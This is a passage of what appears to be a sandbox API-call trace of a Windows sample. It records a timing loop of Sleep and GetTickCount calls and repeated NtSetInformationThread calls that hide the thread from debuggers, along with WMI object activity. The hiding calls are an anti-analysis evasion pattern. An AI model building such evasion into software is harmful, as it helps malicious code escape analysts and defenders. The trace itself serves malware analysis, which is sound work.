wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0xd, wMilliseconds=0x234)) [0167.578] GetTickCount () returned 0x115c987 [0167.578] Sleep (dwMilliseconds=0x3e8) [0169.316] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0xf, wMilliseconds=0x128)) [0169.316] GetTickCount () returned 0x115d04a [0169.316] Sleep (dwMilliseconds=0x3e8) [0171.031] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x10, wMilliseconds=0x220)) [0171.031] GetTickCount () returned 0x115d52a [0171.031] Sleep (dwMilliseconds=0x3e8) [0173.458] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x12, wMilliseconds=0x27a)) [0173.459] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0173.460] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0173.460] GetCurrentThread () returned 0xfffffffe [0173.460] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0173.460] GetTickCount () returned 0x115dd55 [0173.460] Sleep (dwMilliseconds=0x3e8) [0175.833] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x13, wMilliseconds=0x344)) [0175.833] GetTickCount () returned 0x115e206 [0175.833] Sleep (dwMilliseconds=0x3e8) [0177.062] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x15, wMilliseconds=0x44)) [0177.062] GetTickCount () returned 0x115e6d6 [0177.062] Sleep (dwMilliseconds=0x3e8) [0178.404] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x16, wMilliseconds=0x11d)) [0178.404] GetTickCount () returned 0x115eb97 [0178.404] Sleep (dwMilliseconds=0x3e8) [0180.289] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x17, wMilliseconds=0x2b1)) [0180.289] GetTickCount () returned 0x115f113 [0180.289] Sleep (dwMilliseconds=0x3e8) [0181.762] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x18, wMilliseconds=0x399)) [0181.762] GetTickCount () returned 0x115f5e4 [0181.762] Sleep (dwMilliseconds=0x3e8) [0183.203] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x1a, wMilliseconds=0x7a)) [0183.203] GetTickCount () returned 0x115fa95 [0183.203] Sleep (dwMilliseconds=0x3e8) [0184.559] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x1b, wMilliseconds=0x1e0)) [0184.559] GetTickCount () returned 0x115ffe2 [0184.559] Sleep (dwMilliseconds=0x3e8) [0185.760] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x1c, wMilliseconds=0x28a)) [0185.760] GetTickCount () returned 0x1160474 [0185.760] Sleep (dwMilliseconds=0x3e8) [0187.148] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x1e, wMilliseconds=0x26)) [0187.148] GetTickCount () returned 0x11609e1 [0187.148] Sleep (dwMilliseconds=0x3e8) [0188.703] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x1f, wMilliseconds=0x256)) [0188.709] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0188.709] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0188.709] GetCurrentThread () returned 0xfffffffe [0188.709] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0188.710] GetTickCount () returned 0x1160ff9 [0188.710] Sleep (dwMilliseconds=0x3e8) [0190.217] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x20, wMilliseconds=0x3cb)) [0190.217] GetTickCount () returned 0x1161555 [0190.217] Sleep (dwMilliseconds=0x3e8) [0191.925] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x22, wMilliseconds=0x10)) [0191.925] GetTickCount () returned 0x116196b [0191.925] Sleep (dwMilliseconds=0x3e8) [0193.123] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x23, wMilliseconds=0xd9)) [0193.123] GetTickCount () returned 0x1161e1c [0193.123] Sleep (dwMilliseconds=0x3e8) [0194.235] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x24, wMilliseconds=0x145)) [0194.235] GetTickCount () returned 0x116226f [0194.235] Sleep (dwMilliseconds=0x3e8) [0195.389] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x25, wMilliseconds=0x1c0)) [0195.389] GetTickCount () returned 0x11626d3 [0195.389] Sleep (dwMilliseconds=0x3e8) [0196.512] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x26, wMilliseconds=0x23b)) [0196.512] GetTickCount () returned 0x1162b36 [0196.512] Sleep (dwMilliseconds=0x3e8) [0197.629] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x27, wMilliseconds=0x2b6)) [0197.629] GetTickCount () returned 0x1162f99 [0197.629] Sleep (dwMilliseconds=0x3e8) [0198.730] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x28, wMilliseconds=0x322)) [0198.730] GetTickCount () returned 0x11633ed [0198.730] Sleep (dwMilliseconds=0x3e8) [0199.744] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x29, wMilliseconds=0x330)) [0199.744] GetTickCount () returned 0x11637e3 [0199.744] Sleep (dwMilliseconds=0x3e8) [0200.790] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x2a, wMilliseconds=0x34e)) [0200.790] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0200.790] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0200.790] GetCurrentThread () returned 0xfffffffe [0200.790] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0200.791] GetTickCount () returned 0x1163be8 [0200.791] Sleep (dwMilliseconds=0x3e8) [0201.860] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x2b, wMilliseconds=0x38a)) [0201.860] GetTickCount () returned 0x116400d [0201.860] Sleep (dwMilliseconds=0x3e8) [0202.986] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x2c, wMilliseconds=0x3c7)) [0202.986] GetTickCount () returned 0x1164432 [0202.986] Sleep (dwMilliseconds=0x3e8) [0204.089] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x2e, wMilliseconds=0x4b)) [0204.089] GetTickCount () returned 0x1164885 [0204.089] Sleep (dwMilliseconds=0x3e8) [0205.136] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x2f, wMilliseconds=0x78)) [0205.136] GetTickCount () returned 0x1164c9b [0205.136] Sleep (dwMilliseconds=0x3e8) [0206.248] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x30, wMilliseconds=0xe4)) [0206.248] GetTickCount () returned 0x11650ee [0206.248] Sleep (dwMilliseconds=0x3e8) [0207.396] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x31, wMilliseconds=0x16e)) [0207.396] GetTickCount () returned 0x1165561 [0207.396] Sleep (dwMilliseconds=0x3e8) [0208.447] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x32, wMilliseconds=0x19c)) [0208.447] GetTickCount () returned 0x1165976 [0208.447] Sleep (dwMilliseconds=0x3e8) [0209.574] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x33, wMilliseconds=0x217)) [0209.574] GetTickCount () returned 0x1165dd9 [0209.574] Sleep (dwMilliseconds=0x3e8) [0210.586] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x34, wMilliseconds=0x225)) [0210.586] GetTickCount () returned 0x11661cf [0210.586] Sleep (dwMilliseconds=0x3e8) [0211.835] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x35, wMilliseconds=0x31d)) [0211.837] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0211.837] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0211.837] GetCurrentThread () returned 0xfffffffe [0211.837] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0211.837] GetTickCount () returned 0x11666af [0211.837] Sleep (dwMilliseconds=0x3e8) [0212.942] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x36, wMilliseconds=0x388)) [0212.942] GetTickCount () returned 0x1166b03 [0212.942] Sleep (dwMilliseconds=0x3e8) [0214.133] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x38, wMilliseconds=0x4a)) [0214.133] GetTickCount () returned 0x1166f95 [0214.134] Sleep (dwMilliseconds=0x3e8) [0215.517] GetLocalTime (in: lpSystemTime=0x2fef78c | out: lpSystemTime=0x2fef78c*(wYear=0x7e4, wMonth=0x9, wDayOfWeek=0x3, wDay=0x10, wHour=0x8, wMinute=0xb, wSecond=0x39, wMilliseconds=0x1cf)) [0215.517] GetTickCount () returned 0x1167501 [0215.517] Sleep (dwMilliseconds=0x3e8) Thread: id = 4 os_tid = 0x48c [0077.413] SysReAllocStringLen (in: pbstr=0x34cf764*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x34cf764*="KERNEL32.DLL") returned 1 [0077.413] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0077.413] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0077.416] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0077.416] SysReAllocStringLen (in: pbstr=0x34cf764*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x34cf764*="KERNEL32.DLL") returned 1 [0077.416] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0077.416] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0077.418] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0077.419] SysReAllocStringLen (in: pbstr=0x34cf740*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x34cf740*="KERNEL32.DLL") returned 1 [0077.419] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0077.419] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0077.421] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0077.423] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 5 os_tid = 0x774 [0078.554] SysReAllocStringLen (in: pbstr=0x32bf8e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x32bf8e4*="KERNEL32.DLL") returned 1 [0078.554] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0078.556] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0078.558] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0078.559] SysReAllocStringLen (in: pbstr=0x32bf8e4*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x32bf8e4*="KERNEL32.DLL") returned 1 [0078.559] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0078.559] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0078.561] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0078.562] SysReAllocStringLen (in: pbstr=0x32bf8c0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x32bf8c0*="KERNEL32.DLL") returned 1 [0078.562] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0078.562] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0078.564] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0078.566] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0078.732] GetCurrentThreadId () returned 0x774 [0078.732] ResetEvent (hEvent=0xb8) returned 1 [0078.732] GetCurrentThreadId () returned 0x774 [0078.733] GetCurrentThreadId () returned 0x774 [0078.733] GetCurrentThreadId () returned 0x774 [0078.733] ResetEvent (hEvent=0xb8) returned 1 [0078.733] GetCurrentThreadId () returned 0x774 [0078.733] GetCurrentThreadId () returned 0x774 [0078.733] SetEvent (hEvent=0xbc) returned 1 [0078.733] SetEvent (hEvent=0xb8) returned 1 [0078.733] CloseHandle (hObject=0x200) returned 1 [0078.733] GetCurrentThreadId () returned 0x774 [0078.733] ResetEvent (hEvent=0xb8) returned 1 [0078.733] GetCurrentThreadId () returned 0x774 [0078.733] GetCurrentThreadId () returned 0x774 [0078.733] GetCurrentThreadId () returned 0x774 [0078.733] GetCurrentThreadId () returned 0x774 [0078.733] ResetEvent (hEvent=0xb8) returned 1 [0078.733] GetCurrentThreadId () returned 0x774 [0078.733] GetCurrentThreadId () returned 0x774 [0078.734] SetEvent (hEvent=0xbc) returned 1 [0078.734] SetEvent (hEvent=0xb8) returned 1 [0078.734] CloseHandle (hObject=0x200) returned 1 [0078.734] GetCurrentThreadId () returned 0x774 [0078.734] ResetEvent (hEvent=0xb8) returned 1 [0078.734] GetCurrentThreadId () returned 0x774 [0078.734] GetCurrentThreadId () returned 0x774 [0078.734] GetCurrentThreadId () returned 0x774 [0078.734] GetCurrentThreadId () returned 0x774 [0078.734] ResetEvent (hEvent=0xb8) returned 1 [0078.734] GetCurrentThreadId () returned 0x774 [0078.734] GetCurrentThreadId () returned 0x774 [0078.734] SetEvent (hEvent=0xbc) returned 1 [0078.734] SetEvent (hEvent=0xb8) returned 1 [0078.734] CloseHandle (hObject=0x204) returned 1 [0078.734] GetCurrentThreadId () returned 0x774 [0078.734] ResetEvent (hEvent=0xb8) returned 1 [0078.735] GetCurrentThreadId () returned 0x774 [0078.735] GetCurrentThreadId () returned 0x774 [0078.735] GetCurrentThreadId () returned 0x774 [0078.735] GetCurrentThreadId () returned 0x774 [0078.735] ResetEvent (hEvent=0xb8) returned 1 [0078.735] GetCurrentThreadId () returned 0x774 [0078.735] GetCurrentThreadId () returned 0x774 [0078.735] SetEvent (hEvent=0xbc) returned 1 [0078.735] SetEvent (hEvent=0xb8) returned 1 [0078.735] CloseHandle (hObject=0x200) returned 1 [0078.735] GetCurrentThreadId () returned 0x774 [0078.735] ResetEvent (hEvent=0xb8) returned 1 [0078.735] GetCurrentThreadId () returned 0x774 [0078.735] GetCurrentThreadId () returned 0x774 [0078.735] GetCurrentThreadId () returned 0x774 [0078.735] GetCurrentThreadId () returned 0x774 [0078.735] ResetEvent (hEvent=0xb8) returned 1 [0078.735] GetCurrentThreadId () returned 0x774 [0078.736] GetCurrentThreadId () returned 0x774 [0078.736] SetEvent (hEvent=0xbc) returned 1 [0078.736] SetEvent (hEvent=0xb8) returned 1 [0078.736] CloseHandle (hObject=0x200) returned 1 [0079.426] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0093.924] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0093.924] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0093.924] WbemLocator:IUnknown:Release (This=0x6010d60) returned 0x1 [0093.924] WbemLocator:IUnknown:Release (This=0x6010d60) returned 0x0 [0093.924] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0093.924] WbemLocator:IUnknown:Release (This=0x601f700) returned 0x1 [0093.924] WbemLocator:IUnknown:Release (This=0x601f700) returned 0x0 [0093.925] IUnknown:Release (This=0x6021288) returned 0x0 [0093.925] IUnknown:Release (This=0x601efb0) returned 0x0 [0095.079] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0095.079] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0095.079] WbemLocator:IUnknown:Release (This=0xb5a8e4) returned 0x1 [0095.079] WbemLocator:IUnknown:Release (This=0x601d544) returned 0x0 [0095.083] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0095.083] WbemLocator:IUnknown:Release (This=0xb5a704) returned 0x1 [0095.083] WbemLocator:IUnknown:Release (This=0x601f81c) returned 0x0 [0095.085] IUnknown:Release (This=0xb51e28) returned 0x0 [0095.085] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0095.085] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0095.085] WbemDefPath:IUnknown:Release (This=0x6010820) returned 0x1 [0095.085] WbemDefPath:IUnknown:Release (This=0x6010820) returned 0x0 [0095.085] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0095.085] WbemDefPath:IUnknown:Release (This=0x6010ba0) returned 0x1 [0095.085] WbemDefPath:IUnknown:Release (This=0x6010ba0) returned 0x0 [0095.085] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0095.085] WbemDefPath:IUnknown:Release (This=0x601cc08) returned 0x1 [0095.085] WbemDefPath:IUnknown:Release (This=0x601cc08) returned 0x0 [0095.085] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0095.085] WbemDefPath:IUnknown:Release (This=0x601f198) returned 0x1 [0095.085] WbemDefPath:IUnknown:Release (This=0x601f198) returned 0x0 [0133.643] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0133.643] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.643] WbemLocator:IUnknown:Release (This=0x60108d0) returned 0x1 [0133.643] WbemLocator:IUnknown:Release (This=0x60108d0) returned 0x0 [0133.643] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.643] WbemLocator:IUnknown:Release (This=0x601f2e8) returned 0x1 [0133.643] WbemLocator:IUnknown:Release (This=0x601f2e8) returned 0x0 [0133.643] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.643] IUnknown:Release (This=0x6022d70) returned 0x2 [0133.643] IUnknown:Release (This=0x6022d70) returned 0x1 [0133.643] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.643] IUnknown:Release (This=0x6022ff0) returned 0x2 [0133.643] IUnknown:Release (This=0x6022ff0) returned 0x1 [0133.643] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.643] IUnknown:Release (This=0x6023800) returned 0x2 [0133.643] IUnknown:Release (This=0x6023800) returned 0x1 [0133.644] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.644] IUnknown:Release (This=0x6023b48) returned 0x2 [0133.644] IUnknown:Release (This=0x6023b48) returned 0x1 [0133.644] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.644] IUnknown:Release (This=0x6023e90) returned 0x2 [0133.644] IUnknown:Release (This=0x6023e90) returned 0x1 [0133.644] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.644] IUnknown:Release (This=0x60245e0) returned 0x2 [0133.644] IUnknown:Release (This=0x60245e0) returned 0x1 [0133.644] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.644] IUnknown:Release (This=0x6024d30) returned 0x2 [0133.644] IUnknown:Release (This=0x6024d30) returned 0x1 [0133.644] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.644] IUnknown:Release (This=0x6025080) returned 0x2 [0133.644] IUnknown:Release (This=0x6025080) returned 0x1 [0133.644] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.644] IUnknown:Release (This=0x6026368) returned 0x2 [0133.644] IUnknown:Release (This=0x6026368) returned 0x1 [0133.644] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.644] IUnknown:Release (This=0x6026650) returned 0x2 [0133.644] IUnknown:Release (This=0x6026650) returned 0x1 [0133.644] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.644] IUnknown:Release (This=0x6026908) returned 0x2 [0133.644] IUnknown:Release (This=0x6026908) returned 0x1 [0133.644] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.644] IUnknown:Release (This=0x6026bf0) returned 0x2 [0133.645] IUnknown:Release (This=0x6026bf0) returned 0x1 [0133.645] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.645] IUnknown:Release (This=0x6026ea8) returned 0x2 [0133.645] IUnknown:Release (This=0x6026ea8) returned 0x1 [0133.645] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.645] IUnknown:Release (This=0x6027568) returned 0x2 [0133.645] IUnknown:Release (This=0x6027568) returned 0x1 [0133.645] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.645] IUnknown:Release (This=0x6027850) returned 0x2 [0133.645] IUnknown:Release (This=0x6027850) returned 0x1 [0133.645] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.645] IUnknown:Release (This=0x6027b20) returned 0x2 [0133.645] IUnknown:Release (This=0x6027b20) returned 0x1 [0133.645] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.645] IUnknown:Release (This=0x6027cb8) returned 0x2 [0133.645] IUnknown:Release (This=0x6027cb8) returned 0x1 [0133.645] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.645] IUnknown:Release (This=0x6027e50) returned 0x2 [0133.645] IUnknown:Release (This=0x6027e50) returned 0x1 [0133.645] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.645] IUnknown:Release (This=0x6027fe8) returned 0x2 [0133.645] IUnknown:Release (This=0x6027fe8) returned 0x1 [0133.645] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.645] IUnknown:Release (This=0x6028180) returned 0x2 [0133.645] IUnknown:Release (This=0x6028180) returned 0x1 [0133.646] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.646] IUnknown:Release (This=0x6028318) returned 0x2 [0133.646] IUnknown:Release (This=0x6028318) returned 0x1 [0133.646] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.646] IUnknown:Release (This=0x60284b0) returned 0x2 [0133.646] IUnknown:Release (This=0x60284b0) returned 0x1 [0133.646] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.646] IUnknown:Release (This=0x6028648) returned 0x2 [0133.646] IUnknown:Release (This=0x6028648) returned 0x1 [0133.646] CoGetContextToken (in: pToken=0x32bf9c0 | out: pToken=0x32bf9c0) returned 0x0 [0133.646] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.646] WbemDefPath:IUnknown:Release (This=0x601f0f0) returned 0x1 [0133.646] WbemDefPath:IUnknown:Release (This=0x601f0f0) returned 0x0 [0133.646] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.646] WbemDefPath:IUnknown:Release (This=0x601f1d8) returned 0x1 [0133.646] WbemDefPath:IUnknown:Release (This=0x601f1d8) returned 0x0 [0133.646] CoGetContextToken (in: pToken=0x32bf948 | out: pToken=0x32bf948) returned 0x0 [0133.646] WbemDefPath:IUnknown:Release (This=0x601ff00) returned 